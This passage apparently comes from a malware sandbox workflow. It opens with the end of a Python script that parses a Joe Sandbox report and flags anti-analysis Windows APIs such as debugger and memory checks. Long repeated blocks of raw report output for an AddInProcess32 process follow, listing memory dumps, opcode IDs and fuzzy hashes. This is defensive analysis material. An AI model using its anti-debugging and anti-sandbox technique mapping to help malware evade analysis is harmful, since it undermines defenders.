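        elif line.startswith("Uniqueness Score:"):
            current["fields"]["Uniqueness Score"] = line.split(":", 1)[1].strip()
    return records


def flag_anti_analysis(records):
    """Map each flagged API to its technique and the distinct call-site refs."""
    hits = {}
    for rec in records:
        for api, _module, ref in rec["apis"]:
            technique = ANTI_ANALYSIS.get(api)
            if technique is None:
                continue
            entry = hits.setdefault(api, {"technique": technique, "refs": []})
            if ref not in entry["refs"]:
                entry["refs"].append(ref)
    return hits


if __name__ == "__main__":
    for api, info in flag_anti_analysis(parse_records(SAMPLE)).items():
        print(f"{api}: {info['technique']} at {', '.join(info['refs'])}")
```

The parser tolerates the two call-site spellings the report uses (with and without an argument list) and keeps the uniqueness score as the string the report prints, since the report does not document how that value is derived. Running the script on the sample lists CheckRemoteDebuggerPresent and GlobalMemoryStatusEx with their reference addresses; DeleteFileW is parsed but not flagged.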

Control-flow Graph
control_flow_graph 1277 669fecb-669fef6 1291 669fef9 call 12bef00 1277->1291 1292 669fef9 call 12beef0 1277->1292 1279 669feff-669ff1e 1283 669ff26-669ff50 1279->1283 1286 669ff71 1283->1286 1287 669ff52-669ff6f 1283->1287 1288 669ff83-669ff8a 1286->1288 1287->1288 1291->1279 1292->1279
Strings
Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: |
• API String ID: 0-2343686810
• Opcode ID: c8f5a15c52d90748da8c72cb4e658a9d9ed989ae321a16378290c48d2c5e3cf2
• Instruction ID: 739c7a61be71b34254bcf8e9b2baf68522906e39fe7f6217610bdf3a9c45c7ee
• Opcode Fuzzy Hash: c8f5a15c52d90748da8c72cb4e658a9d9ed989ae321a16378290c48d2c5e3cf2
• Instruction Fuzzy Hash: 35117C71F40214DFDB54DB78C845BAEBBF5AF88700F108469E90AE73A0DB75A941CB94
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
Strings
Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: |
• API String ID: 0-2343686810
• Opcode ID: fbbd7194df495848834c52e38563f847844b9f052abb60b12ec28fa3ebb751c2
• Instruction ID: c163a5b096949fd8c13085c1b6fa1c6f1b95e39552e5472dc7d66116d05a07c2
• Opcode Fuzzy Hash: fbbd7194df495848834c52e38563f847844b9f052abb60b12ec28fa3ebb751c2
• Instruction Fuzzy Hash: 17114974F40214DFDB549B798804B6EBBF5AF88704F10846AE90AE73A0DA35A941CB94
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d320f617efb2d858bd990213d56c80c96958df71611dd7229bc9638bba2c02e1
• Instruction ID: c98ff5bdc0f77490487eb5c0e5b8b3001eb376d5b69abc558cb0b539494adcbe
• Opcode Fuzzy Hash: d320f617efb2d858bd990213d56c80c96958df71611dd7229bc9638bba2c02e1
• Instruction Fuzzy Hash: F4626D30A006098FCB65EF68D590A5EB7E6FF85300F60CA68D4469F355DBB1EC86CB91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 28f227b3f6d72e9fb38dc02a769e5a2322c0b522e6fc7240d71dcc1073be5515
• Instruction ID: 8175f18bda179680bb94e8ad48fd815f3ebdc36c0f5dd4c9439a84e9d9672799
• Opcode Fuzzy Hash: 28f227b3f6d72e9fb38dc02a769e5a2322c0b522e6fc7240d71dcc1073be5515
• Instruction Fuzzy Hash: 51027F30E102098FDFA4DB69E5807AEB7B5FB45310F60852AD855EB395DB70EC81CBA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2eca16293ff0ca45c70181267c010ae7dcafb3c44fd1819c69ea9276586d16ec
• Instruction ID: 96031eda6804583a34b876d42879cb46d6c2d8a3aa381b295911b327f5095ceb
• Opcode Fuzzy Hash: 2eca16293ff0ca45c70181267c010ae7dcafb3c44fd1819c69ea9276586d16ec
• Instruction Fuzzy Hash: FFE17030E102098FDF65DBA9D4906AEB7F6FF85310F608529E805EB355DB709C86CBA1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 018b16e641922c02da98b54d61fed83c18f92a84642985e05f2f4c730512a4f2
• Instruction ID: b46841947731097f0a0a4888817cb2ec82a09b89885c572fd0330fc0902f763d
• Opcode Fuzzy Hash: 018b16e641922c02da98b54d61fed83c18f92a84642985e05f2f4c730512a4f2
• Instruction Fuzzy Hash: A3914070B402198FDF64EB69D8607AE77F6FF89300F148569D809EB384EE70AD418B91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1b4887c710a93363a2bfb7d8905e6300a3105d5c1cabc071d588f21a32e838c0
• Instruction ID: 6d736c6945012ce37a9cd28e99efbe82ef070166fa416fded96e1397cd66d14c
• Opcode Fuzzy Hash: 1b4887c710a93363a2bfb7d8905e6300a3105d5c1cabc071d588f21a32e838c0
• Instruction Fuzzy Hash: 4161B171F401104FDF559B6ECC8066EBADBAFD8620B658439D80ADB364DEB5EC0287D1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aa68d48d9455e07e4a05465fc3d7b51aebb4f34b9f6a627d986cbece0c7820ef
• Instruction ID: 6d8c015c5425403e7a69a2c005b11a6747c758fab2b515e5c789f355a93b6fa2
• Opcode Fuzzy Hash: aa68d48d9455e07e4a05465fc3d7b51aebb4f34b9f6a627d986cbece0c7820ef
• Instruction Fuzzy Hash: F4811C70B402099FDF54EFB9D4A06AE7BE6BF89310F108529D819DB385EE35DC828B51
Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ccfef5fe5ed4794da46b6992df2b52897825514d4b872fdc02a1aebdff8ba7c3
                                                                                                                                                                                                                                                    • Instruction ID: c569df8a707dfeb071c6595965eac12fdcd470ccec14a373934dfe1bb5de9950
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ccfef5fe5ed4794da46b6992df2b52897825514d4b872fdc02a1aebdff8ba7c3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69913E30E106198FDF64DF68C880B99B7B5FF89310F208699D949BB345DB70A986CF91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bd5aeaafd68ae0731ae0cc1fbbd4e59c25e6d44942ca52f781589c01bc82e9a0
                                                                                                                                                                                                                                                    • Instruction ID: bf27f962b1ae3d9bb69c3f26f0bbb84d4b81c7e990352de88c60bc54c2a4f5bc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd5aeaafd68ae0731ae0cc1fbbd4e59c25e6d44942ca52f781589c01bc82e9a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66914F30E106198BDF64DF68C880B9DB7B1FF89310F208599D949BB341EB70A986CF91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d681676cc49dc31087060a9ac08fbe5d3906a4883d4765fcb7c896e71c019a83
                                                                                                                                                                                                                                                    • Instruction ID: d12b4df2574a7d67024cc55234b8f1c41b149fbc1a2e05e53952ee7c93ac29c4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d681676cc49dc31087060a9ac08fbe5d3906a4883d4765fcb7c896e71c019a83
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87714070A002099FDF54DBA9D990AAEBBFAFF88300F148529D855EB355DB31EC46CB50
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: cda490158b8b51560e6b1bec0417023bbcc8e99c603c11d9e0875d76fab20bba
                                                                                                                                                                                                                                                    • Instruction ID: a77756786f4101d7bc0131cc182c10393b86663ee55e6f4193398f6193117936
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cda490158b8b51560e6b1bec0417023bbcc8e99c603c11d9e0875d76fab20bba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C715F70A002099FDF54DBA9D990AAEBBFAFF84300F148529D855EB354DB31EC46CB51
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 511d69cce45359d6219b07af849caecd1f49a5eb1cb37cca0c467d086310bdc7
                                                                                                                                                                                                                                                    • Instruction ID: 33ac594f5861411c9d1bd6307324dbb6e33b743c43f3e192b3f37cae5b4ae44f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 511d69cce45359d6219b07af849caecd1f49a5eb1cb37cca0c467d086310bdc7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA615E34F402089FEF559FA5C8547AEBBF6FB88340F208529E506AB395DF718C468B91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6d5c330832ebc895c66d02de855958281c4b4f6d2e6db22245188b65f8bda2e7
                                                                                                                                                                                                                                                    • Instruction ID: 5a48a896468d78cdb6c5023837876346b095e78764905788eae78e9128ba5480
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6d5c330832ebc895c66d02de855958281c4b4f6d2e6db22245188b65f8bda2e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41510531E00209DFDF24AB78E4946AEB7B6FB85315F118879E906D7350DB319C55C7A0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 419fa665fff481a84b07a36b8fa76f33d38273ca9a19fba0c2c30b76f813b41d
                                                                                                                                                                                                                                                    • Instruction ID: 9bc790c7c083f8cb67944f554c61714c5ea93bdb984978b7b6f6f14a4c34bd38
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 419fa665fff481a84b07a36b8fa76f33d38273ca9a19fba0c2c30b76f813b41d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A051FA70B10208DFEF745A68C8A476F369EE799710F614436E80AD77D9CEB9CC9143A2
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8ebecf74810e995cc3ff7d3a9fca90035982903da5d2b88df9e5f9a51feacbba
                                                                                                                                                                                                                                                    • Instruction ID: 488eb5408651574781e2ee16243740c3d00d29ae0699bf9cb3cbee3515c4e995
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ebecf74810e995cc3ff7d3a9fca90035982903da5d2b88df9e5f9a51feacbba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0451F870B10208DFEF746A68C86472F369EE799710F60443AE80BD77D9CAB9CC9143A1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9a5b2a4026ba4f65dc30dfbd4af28563d9054125a2fb4dfc2791f68dffd4b106
                                                                                                                                                                                                                                                    • Instruction ID: 12834aeb75db42d5f184aaadb753c555f5e58cea95a524b1ede3fdabc208c2c9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a5b2a4026ba4f65dc30dfbd4af28563d9054125a2fb4dfc2791f68dffd4b106
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97513070B501099FDF68EB78D860B6E77E6FF88350F148569D905D7384EE31AC428B91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 16d86a7072ba05f6b25a527d1f2106d3e310bcc030411007f0f82d245eb51f9e
                                                                                                                                                                                                                                                    • Instruction ID: 85a9d343921d51bcead179b875e3bf540920c1288c122972b0b018bbdf51a6db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16d86a7072ba05f6b25a527d1f2106d3e310bcc030411007f0f82d245eb51f9e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71518174F402089FEB559FA5C8547AEBBF6FF88300F208529E505AB395DE719C468B90
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 691bf68d884d930e55b9fa8ffbba30551678203d0ea6986cb75c3c29e1d03364
                                                                                                                                                                                                                                                    • Instruction ID: 681b95ebb36b5a8c8213bd5a4c7610896a86ad1c16d8d96145593bda16695376
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 691bf68d884d930e55b9fa8ffbba30551678203d0ea6986cb75c3c29e1d03364
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36415F71E106098FDF61CEA9D880AAFF7BAEB84310F10492AE616D7651D230E9558BA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6616330533deee2771647882db9ef0e4b46091f7eb03bf5a7f8e3d80245db02b
                                                                                                                                                                                                                                                    • Instruction ID: cea47e948a54f212f21e8025c56589c5ae9dc94eb4e9868344ea60e82b2c7b35
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6616330533deee2771647882db9ef0e4b46091f7eb03bf5a7f8e3d80245db02b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0418270E00B099FDF65DFA5C4946AEBBBABF85340F104529D802EB344EB719846CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 360b43a986a7e13ab07e303b14fab12f96e57759d06836517793ec5e757f34e7
                                                                                                                                                                                                                                                    • Instruction ID: 7f87208806b5f4bb9f9b699d3bc58ea617f1eeab0a21a3828f7a94c41624d322
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 360b43a986a7e13ab07e303b14fab12f96e57759d06836517793ec5e757f34e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89419574E002058FDF718B6AC88077EF7BAFB85310F248926E956D73A1CA74D941DBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e6947d9723f7bf830b27532dcb8e03e9a7a7b8f91714c2d0b4f43ab16d604ea0
                                                                                                                                                                                                                                                    • Instruction ID: 0797d7728c5a8850c8fdc75f6933dbe85331aa43a7b427a8a05a5c71ae10631f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6947d9723f7bf830b27532dcb8e03e9a7a7b8f91714c2d0b4f43ab16d604ea0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC31E530B102059FDF59AB74D4646AF7BAABF89210F20456DD802DB385DF35CD46CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 26938eab064581142fe098ece549c54f03cf74d78dacad2f83612be1db053436
                                                                                                                                                                                                                                                    • Instruction ID: 150f1e7f88508d34bcae4e6202198516decfffb36166fa6d260c4454f14f9304
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26938eab064581142fe098ece549c54f03cf74d78dacad2f83612be1db053436
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A31B030B1020A9FDF59AB74D46476F7BAABF89610F604568D802DB385DE31CD46C7E1
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000002B.00000002.2512584848.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_106d000_AddInProcess32.jbxd
Similarity
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000002B.00000002.2512584848.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_106d000_AddInProcess32.jbxd
Similarity
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
Similarity
                                                                                                                                                                                                                                                    • Opcode ID: b68fd0c54a025862acb0f3541fdfa0c501fa508b04fd180360b0868601cbe93f
                                                                                                                                                                                                                                                    • Instruction ID: 5763328494ddb92d8688bb3e4678d4ac93ab27a52f5b5d0918d88febeb3352bf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b68fd0c54a025862acb0f3541fdfa0c501fa508b04fd180360b0868601cbe93f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D101DF35B401105BDF609A6ED491B2FB7DADBC9710F20883AE90ACB3C0DE61DC8343A1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.2545965733.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_6690000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                    Similarity
